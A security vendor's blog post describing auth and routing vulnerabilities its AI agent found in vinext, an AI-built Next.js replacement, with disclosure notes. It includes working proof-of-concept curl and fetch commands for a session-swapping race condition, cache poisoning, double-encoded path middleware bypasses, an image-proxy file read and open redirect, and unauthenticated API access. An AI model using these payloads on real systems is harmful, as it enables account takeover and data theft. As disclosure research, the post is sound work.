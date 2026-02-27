Cloudflare built a Next.js replacement in a week with AI for $1100. We pointed Hacktron at it to find what the tests missed.

In case you haven’t seen the lore, Cloudflare built a Next.js replacement called vinext in a week with one engineer for like $1100? I’m sure it’s not a full drop-in replacement yet, but it’s still an insane showcase of what current models can do. If the problem is well-specified and you give it tight test cases as feedback, the model will happily crank out code that passes.

The catch is most of the tests driving vinext are functional requirements. “Make it behave like X,” “match these outputs,” “pass these cases.” Vulnerabilities do not live there. They live in the negative space, and in complex interactions between layers, the stuff nobody wrote a test for.

So even if Next.js has a solid implementation for a specific feature, often because someone already found a vulnerability and it got patched, that security does not automatically transfer to a fresh reimplementation with different abstracts.

The model’s objective is not “be secure.” It is “pass the tests,” and it will take whatever route gets it there. Nobody is writing a test case for a weird parser differential between middleware and the router.

So when I saw this announcement on X, I knew it was going to be a goldmine. We ran Hacktron against vinext to hunt for that negative space, and in this post I’ll walk through some of the interesting bugs it found. But first, a quick detour on why complex vibe-coded projects are structurally vulnerable, and why securing them requires equally costly vibe-hacking or even more.

Security and Inference

Developing is constraint solving. Whether it’s an LLM or a human, the task is to make the requirements work, ship the feature, pass the tests, satisfy the spec.

Hacking on the other hand is opposite. You search for broken assumptions and forbidden states in the negative space which is vast, therefore fundamentally more inference-intensive than programming.

be conservative in what you do, be liberal in what you accept from others. - a hacker’s best friend https://www.rfc-editor.org/rfc/rfc761#section-2.10

Think about why Signal is considered secure. It’s not one brilliant design decision. Every layer of it has had an insane amount of adversarial attention from cryptographers, security auditors, and researchers over years, and its attack surface is relatively narrow compared to something like a web framework. That’s thousands of hours of humans thinking about the negative space of a well-scoped problem. And I’m not saying it’s unbreakable. A nasty bug can still surface when someone throws more inference at the right seam, or when a new feature introduces an interaction nobody expected.

When something gets built in a week with AI like vinext, odds are it ships with vulnerabilities, so deploying it blindly on day one is a bad idea. It’s not that “LLM code is bad.” First versions written by humans are just as fragile. In our audits, v1 is almost always the easy target. Now, LLM speed just widens the gap.

Now the obvious question is, how do you audit something like this at the same speed it’s being shipped? This pace is basically inevitable from now on.

The answer is you need the same kind of AI on the other side, but aimed at the negative space. You can’t brute-force the whole state space, so you rely on heuristics that steer the search into the high-risk areas. And like most inference-heavy problems, it scales with compute, more tokens, more coverage, more bugs.

Vulnerabilities

The moment I saw the announcement on Twitter, I gave Hacktron context describing the attack surface to look for and went to sleep. It came back with 45 findings. After dropping low-severity issues and a few false positives, the 24 below are the ones I manually validated. Many share the same root cause (race conditions, parser differentials); a few are just code-quality issues. The model often misassigns severity, so take the labels with a grain of salt, but the Criticals are genuinely critical.

Throughout the whole workflow, finding bugs is the easy part, the agent will find plenty. The hard part is deciding which ones matter, and that depends on the environment. If the right setup is in place, the agent can triage on its own. Most of the time it’s not, and that last mile of severity judgment still needs a human, whether that’s a developer or a security researcher at the company, to validate it.

I held off reporting for a day and tried reaching the repo owner on Twitter because I was thinking of bundling everything into one big report, but interestingly, Vercel’s security team independently flagged a few of the same bugs, and Cloudflare started patching. I reported through security@, HackerOne, and GitHub. I also wasn’t given disclosure permission, but honestly, we’re in wild times. Traditional 90-day disclosure policies aren’t going to hold up when things are shipping at this speed. FWIW, I didn’t get any acknowledgement on GitHub or HackerOne that my reports were received, but the issues did get fixed on GitHub, which is good.

# Severity Title Status 1 Critical Race Condition in Private Cache via Unsafe AsyncLocalStorage Fallback 2 Critical Cross-Request State Pollution in SSR via Missing AsyncLocalStorage Shim 3 Critical Race Condition in Global Fallback State leads to Session Hijacking 4 Critical Unsafe Global Fallback in Navigation State Leading to Cross-Request Data Leak 5 High Shared Cache Poisoning via Missing Auth Header Heuristics 6 High ACL Bypass and Path Traversal via Unsafe URL Decoding in Router 7 High Path Confusion and Middleware Bypass via Premature URI Decoding 8 High Authorization and Routing Bypass via Path Normalization Discrepancy 9 High Reverse Proxy Path Traversal and Routing Bypass via Catch-All Route Confusion 10 High SSRF and Routing Bypass via Path Traversal in matchConfigPattern 11 Medium Middleware Bypass via Improper Regex Escaping in Matcher Patterns 12 Medium Middleware Header Deletion Bypass (Authentication Bypass) 13 High Insecure Default Middleware Exclusion for API Routes 14 Medium Improper Handling of Set-Cookie Headers in Generated Middleware 15 Low ReDoS Protection Bypass in isSafeRegex via Alternation 16 Medium Middleware Bypass via Image Optimization Endpoint 17 Medium Leaking Hop-by-Hop Headers in External Proxy 18 Informational Remote Code Execution via Path Injection in startLocalServer [negligible severity] 19 Informational Path Traversal in Static Export Output Generation [negligible severity] 20 Medium Open Redirect via Image Optimization Proxy Bypass 21 Medium Middleware External Rewrite Domain Stripping 22 Medium Missing Dangerous URL Scheme Validation in Link Component Shim 23 Low Build-Time Resource Exhaustion and Cache Pollution via Analytics Poisoning 24 Low Cache Poisoning via Non-Cryptographic Hash Collision in ISR Cache [hard to exploit]

Now, let’s see the top five bugs. You can read the full details of the scan here https://app.hacktron.ai/disclosed/pentests/web_Y2xvdWRmbGFyZS92aW5leHQ_1772212820941_j0huwpwie.

1. Your session is someone else’s session

This is the nastiest one.

Vite keeps RSC and SSR in separate sandboxes that can’t share variables, so vinext used Node’s AsyncLocalStorage to pass request data between them. There are two ways to use it: run() creates an isolated box per request, enterWith() just stamps data onto whatever’s running right now. The model picked enterWith() because it’s simpler and all tests passed, but the tests only send one request at a time. In production with concurrent traffic, one user’s request can read another user’s auth token.

1 function _getState () { 2 return _als . getStore () ?? _fallbackState 3 }

When getStore() returns undefined , every request reads from and writes to the same shared _fallbackState object. On Cloudflare Workers, enterWith() is unavailable. getStore() returns undefined . The fallback fires on every single request, on every deployment, by default.

So when concurrent requests are in-flight and any of them yields at an await , the next request overwrites _fallbackState with its own context. When the first request resumes and calls headers() or cookies() , it reads the second request’s state.

User A gets User B’s session cookie. User B sees User A’s search params. Admin’s cached data gets served to an anonymous user.

Terminal window rm -f /tmp/alice_ * .html /tmp/bob_ * .html for i in $( seq 1 20 ); do curl -s -k -H "cookie: session=sess_admin_9f8a2b" \ "https://poc-race-demo.mohan-a10.workers.dev/dashboard" \ -o /tmp/alice_ $i .html & curl -s -k -H "cookie: session=sess_user_3c7d1e" \ "https://poc-race-demo.mohan-a10.workers.dev/dashboard" \ -o /tmp/bob_ $i .html & done wait grep -rl 'Alice' /tmp/bob_ * .html # Bob got Alice's data grep -rl 'Bob' /tmp/alice_ * .html # Alice got Bob's data

2. Poison Cache for everyone

Consider the following standard Next.js pattern, you fetch user data from an internal API and cache it with tags:

app/api/profile/route.ts 1 export async function GET (request : Request ) { 2 const res = await fetch ( 'https://api.internal/user/profile' , { 3 headers : { Authorization : request . headers . get ( 'Authorization' ) ! }, 4 next : { tags : [ 'profile' ], revalidate : 60 }, 5 }) 6 return Response . json ( await res . json ()) 7 }

Each user sends their own Authorization header, so each user should get their own profile back. On Next.js, this works. On vinext, the first user’s response gets served to everyone.

vinext’s patched fetch caches the response, but the cache key is built from the URL, HTTP method, and request body. What’s not in the key? Request headers.

1 // What buildFetchCacheKey includes: 2 // ✓ URL 3 // ✓ HTTP method 4 // ✓ Request body 5 // ✗ Authorization header ← missing 6 // ✗ Cookie header ← missing

So a request with Authorization: Bearer alice and one with Authorization: Bearer bob to the same URL produce the same cache key. Whoever hits the endpoint first, their response gets served to everyone else on that isolate.

1 const URL = 2 'https://acme-financial-portal.mohan-a10.workers.dev/api/cached-profile' 3 4 const alice = await ( 5 await fetch (URL, { 6 headers : { Authorization : 'Bearer alice' }, 7 }) 8 ) . json () 9 10 const bob = await ( 11 await fetch (URL, { 12 headers : { Authorization : 'Bearer bob' }, 13 }) 14 ) . json () 15 16 const anon = await ( await fetch (URL)) . json () 17 18 console . log ( 'Alice:' , alice . profileData . uuid) 19 console . log ( 'Bob: ' , bob . profileData . uuid) 20 console . log ( 'Anon: ' , anon . profileData . uuid) 21 // All same UUID — Alice's data served to everyone

It was not in Next.js test cases, it is an undocumented heuristic: if a request contains Authorization or Cookie headers, it automatically opts out of shared caching and includes auth-relevant headers in the cache key. This isn’t in any API docs. It’s an invisible invariant that evolved from production incidents. When you reimplement fetch() caching from the API spec, this rule doesn’t exist, hence the bug

3. Your middleware doesn’t protect what you think it does

Say you write a standard auth middleware for your admin panel. Pretty basic.

middleware.ts 1 export function middleware (request : NextRequest ) { 2 if (request . nextUrl . pathname . startsWith ( '/admin' )) { 3 const token = request . cookies . get ( 'session' ) 4 if ( ! token) return NextResponse . redirect ( new URL ( '/login' , request . url)) 5 } 6 }

You expect if you hit /admin without a session cookie, you get bounced to /login .

Except vinext’s request pipeline calls decodeURIComponent() twice at different stages, and passes the half-decoded request to middleware in between. Middleware sees the encoded path, fails to match, and skips auth. The router then fully decodes and serves the protected page.

1 Request: GET /%2561dmin 2 3 app-router-entry.ts: decode("/%2561dmin") → "/%61dmin" 4 │ 5 middleware: pathname = "/%61dmin" 6 startsWith("/admin") → FALSE 7 auth check never runs ✗ 8 │ 9 app-dev-server.ts: decode("/%61dmin") → "/admin" 10 matchRoute: "/admin" → MATCH → page served ✓

There’s one more variant, path traversal via double-encoded slash.

1 Request: GET /foo/..%252fadmin 2 3 Entry decode: /foo/..%2fadmin 4 Middleware: sees /foo/..%2fadmin → no match → passes through 5 Handler decode: /foo/../admin 6 Normalize: /admin → page served

Terminal window # Blocked — middleware works as expected: $ curl -s -o /dev/null -w "%{http_code}" \ "https://acme-financial-portal.mohan-a10.workers.dev/admin" 302 # redirected to /login # Bypass — double-encode 'a': $ curl -s -o /dev/null -w "%{http_code}" \ "https://acme-financial-portal.mohan-a10.workers.dev/%2561dmin" 200 # admin panel served, no auth # Path traversal from any prefix: $ curl -s -o /dev/null -w "%{http_code}" \ "https://acme-financial-portal.mohan-a10.workers.dev/foo/..%252fadmin" 200 # same result

Request Expected Actual GET /admin 302 302 GET /%2561dmin 302 200 GET /api/health/..%252fadmin 302 200 GET /foo/..%252fadmin 302 200

Next.js has one request handler that decodes the URL once and passes the same object through every stage. vinext has five separate entry points. app-router-entry.ts decodes once. The generated RSC entry in app-dev-server.ts decodes again. Middleware sits between them seeing the half-decoded URL. The model wrote correct code at each layer, the layers just disagree on what the URL is. classic PARSER DIFFERENTIALS

4. The image optimizer: Open Redirect and No ACL

The /_vinext/image endpoint runs before middleware. If the image transformation fails (say, you asked it to “optimize” a PDF), the catch block serves the raw file anyway:

1 try { 2 const transformed = await handlers . transformImage (source . body, { 3 width, 4 format, 5 quality, 6 }) 7 return new Response (transformed . body, { status : 200 , headers }) 8 } catch (e) { 9 // Fall through to serve original 10 } 11 return new Response (source . body, { status : 200 , headers })

Terminal window $ curl -s "https://target.com/_vinext/image?url=/secret.txt&w=100" # 200 — raw file served, middleware never ran

Same endpoint also has an open redirect. The validation checks url starts with / and not // . But /\example.com passes — backslash isn’t a slash. Browsers normalize \ to / , so it becomes //example.com and redirects to the attacker’s domain.

Terminal window $ curl -v "https://target.com/_vinext/image?url=/\example.com&w=100" # 302 → //example.com

5. Your API routes have no middleware and you don’t know it

In Next.js, if you don’t define a matcher in your middleware config, middleware runs on all routes, including /api/* . That’s how global auth works. You write one middleware, it protects everything.

vinext silently excludes /api routes from middleware by default:

1 return ( 2 ! pathname . startsWith ( '/_next' ) && 3 ! pathname . startsWith ( '/api' ) && // ← silently skipped 4 ! pathname . includes ( '.' ) && 5 pathname !== '/favicon.ico' 6 )

If you’re migrating from Next.js or just following the docs, your global auth middleware quietly stops protecting every API endpoint. Your /api/user/private-data route is wide open.

Terminal window # Page route — middleware runs, auth checked: $ curl -s -o /dev/null -w "%{http_code}" "https://target.com/dashboard" 302 # redirected to /login # API route — middleware silently skipped: $ curl -s "https://target.com/api/user/private-data" # 200 — data returned, no auth check

Conclusion

Vibe-coding makes software easier to build. Vibe-hacking doesn’t scale the same way. The more code you ship, the more the search space grows, and you need to throw proportional inference at it. If your adversary has even slightly more resources, odds are they find what you missed.

Further, we benchmarked across multiple models internally. Gemini 2.5 Pro with Hacktron turned out to be the most cost-effective, catching everything the other models found. Opus 4.6 was the most expensive and missed a lot. GPT 5.2 is the worst performing one.

Meet our team at hacktron.ai. Reach out at hello@hacktron.ai or hacktron.ai/calendar.